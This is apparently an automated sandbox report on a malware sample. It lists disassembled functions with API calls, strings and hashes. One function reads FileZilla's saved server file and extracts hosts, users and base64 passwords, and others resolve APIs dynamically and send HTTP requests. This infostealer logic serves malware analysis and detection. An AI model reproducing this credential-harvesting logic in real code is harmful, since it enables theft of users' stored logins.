                                  • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                  • Instruction Fuzzy Hash: B311B43182030CABCB68EBE0DD649EDB336AF20300F4042BA960E56195EF341B49CF41
                                  Function 022FD151 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022FD156
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                  Function 0041CEEA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                  Function 0085A403 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0085A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_85a000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                  • Instruction ID: 4c27621c21ab260302db29f998522f6e5be78953b9059d03e825429357bfbb10
                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                  • Instruction Fuzzy Hash: B81182723401009FD744DF99DCC5EA673EAFB89361B298165EE04CB312D6B5EC41C765
                                  Function 022E0D90 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction ID: bf5abefc6b6423cf7346c2d27ca77ede209e7abe5332df108e0fd2707080945d
                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction Fuzzy Hash: 7001AC766205058FDF21DF64C804FAE33E9EB86315F8944B5E907E7245D7B4A6428F90
                                  Function 022F99B7 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00419750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 022FD1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free
                                  • String ID:
                                  • API String ID: 1294909896-0
                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                  • Instruction ID: 4469cbce40bc13bee26ef3afcc501b4ee9c0e37d309943ca325b37e2282ed316
                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                  • Instruction Fuzzy Hash: 9471C132471B40DBD7E63BB1DF01E4AFAA37F04702F104934BADF295749E2268659E51
                                  Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • strtok_s.MSVCRT ref: 0041031B
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                  • strtok_s.MSVCRT ref: 00410679
                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                  • memset.MSVCRT ref: 004106DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 337689325-514892060
                                  • Opcode ID: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                  • Opcode Fuzzy Hash: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                  Function 022E4827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00424DA0), ref: 022E4833
                                  • lstrlen.KERNEL32(00424E50), ref: 022E483E
                                  • lstrlen.KERNEL32(00424F18), ref: 022E4849
                                  • lstrlen.KERNEL32(00424FD0), ref: 022E4854
                                  • lstrlen.KERNEL32(00425078), ref: 022E485F
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022E486E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E4875
                                  • lstrlen.KERNEL32(00425120), ref: 022E4883
                                  • lstrlen.KERNEL32(004251C8), ref: 022E488E
                                  • lstrlen.KERNEL32(00425270), ref: 022E4899
                                  • lstrlen.KERNEL32(00425318), ref: 022E48A4
                                  • lstrlen.KERNEL32(004253C0), ref: 022E48AF
                                  • lstrlen.KERNEL32(00425468), ref: 022E48C3
                                  • lstrlen.KERNEL32(00425510), ref: 022E48CE
                                  • lstrlen.KERNEL32(004255B8), ref: 022E48D9
                                  • lstrlen.KERNEL32(00425660), ref: 022E48E4
                                  • lstrlen.KERNEL32(00425708), ref: 022E48EF
                                  • lstrlen.KERNEL32(004257B0), ref: 022E4918
                                  • lstrlen.KERNEL32(00425858), ref: 022E4923
                                  • lstrlen.KERNEL32(00425920), ref: 022E492E
                                  • lstrlen.KERNEL32(004259C8), ref: 022E4939
                                  • lstrlen.KERNEL32(?), ref: 022E4944
                                  • strlen.MSVCRT ref: 022E4957
                                  • lstrlen.KERNEL32(00425B18), ref: 022E497F
                                  • lstrlen.KERNEL32(00425BC0), ref: 022E498A
                                  • lstrlen.KERNEL32(00425C68), ref: 022E4995
                                  • lstrlen.KERNEL32(00425D10), ref: 022E49A0
                                  • lstrlen.KERNEL32(00425DB8), ref: 022E49AB
                                  • lstrlen.KERNEL32(00425E60), ref: 022E49BB
                                  • lstrlen.KERNEL32(00425F08), ref: 022E49C6
                                  • lstrlen.KERNEL32(00425FB0), ref: 022E49D1
                                  • lstrlen.KERNEL32(00426058), ref: 022E49DC
                                  • lstrlen.KERNEL32(00426100), ref: 022E49E7
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022E4A03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID:
                                  • API String ID: 2127927946-0
                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction ID: 009e106bb8a8acf7574a53d722fb4305cb0b4394e5f6b449cadc73ccaecf0422
                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction Fuzzy Hash: A341A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D511DB3E
                                  Function 022F9AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022F9B51
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022F9B9A
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022F9BCB
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022F9BFC
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022F9C5D
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022F9C75
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022F9C8E
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022F9CA6
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022F9CBE
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022F9CD7
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022F9CEF
                                  • LoadLibraryA.KERNEL32(0064A550,?,022F6C67), ref: 022F9D01
                                  • LoadLibraryA.KERNEL32(0064A17C,?,022F6C67), ref: 022F9D12
                                  • LoadLibraryA.KERNEL32(0064A104,?,022F6C67), ref: 022F9D24
                                  • LoadLibraryA.KERNEL32(0064A1DC,?,022F6C67), ref: 022F9D36
                                  • LoadLibraryA.KERNEL32(0064A328,?,022F6C67), ref: 022F9D47
                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022F9D69
                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022F9D8A
                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022F9DA2
                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022F9DC4
                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022F9DE5
                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022F9E06
                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022F9E1D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID:
                                  • API String ID: 2238633743-0
                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction ID: 47f074e770f5ec293270bee9bdab4cb5247edc57f0da5f447481bbcba2c624c4
                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction Fuzzy Hash: 3BA13CBE5D0240BFE364EFE8ED88A963BFBF74E201714661AE605C3264D7399441DB12
                                  Function 022F04B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                    • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                    • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                    • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                    • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                    • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                    • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                  • strtok_s.MSVCRT ref: 022F0582
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022F05C9
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F05D0
                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 022F05EC
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F05FA
                                    • Part of subcall function 022F8B47: malloc.MSVCRT ref: 022F8B4F
                                    • Part of subcall function 022F8B47: strncpy.MSVCRT ref: 022F8B6A
                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 022F0636
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0644
                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 022F0680
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F068E
                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 022F06CA
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F06DC
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0769
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0781
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0799
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F07B1
                                  • lstrcat.KERNEL32(?,0042164C), ref: 022F07C9
                                  • lstrcat.KERNEL32(?,00421660), ref: 022F07D8
                                  • lstrcat.KERNEL32(?,00421670), ref: 022F07E7
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F07FA
                                  • lstrcat.KERNEL32(?,00421678), ref: 022F0809
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F081C
                                  • lstrcat.KERNEL32(?,0042167C), ref: 022F082B
                                  • lstrcat.KERNEL32(?,00421680), ref: 022F083A
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F084D
                                  • lstrcat.KERNEL32(?,00421688), ref: 022F085C
                                  • lstrcat.KERNEL32(?,0042168C), ref: 022F086B
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F087E
                                  • lstrcat.KERNEL32(?,00421698), ref: 022F088D
                                  • lstrcat.KERNEL32(?,0042169C), ref: 022F089C
                                  • strtok_s.MSVCRT ref: 022F08E0
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F08F5
                                  • memset.MSVCRT ref: 022F0944
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                  • String ID:
                                  • API String ID: 3689735781-0
                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                  • Instruction ID: 00932a0c0d6649626b2fe05d703a4d45960ce4dc3ccbb1e25a9b38d5e34dbdad
                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                  • Instruction Fuzzy Hash: 67D15175A60308ABCB44FBE4DD55EEEB77AFF14700F504429E206A6198DF34AA09CF61
                                  Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00405A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0088C498,00000000,?,00885560,00000000,?,00421A1C), ref: 00405E71
                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                  • HttpOpenRequestA.WININET(00000000,0088C458,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
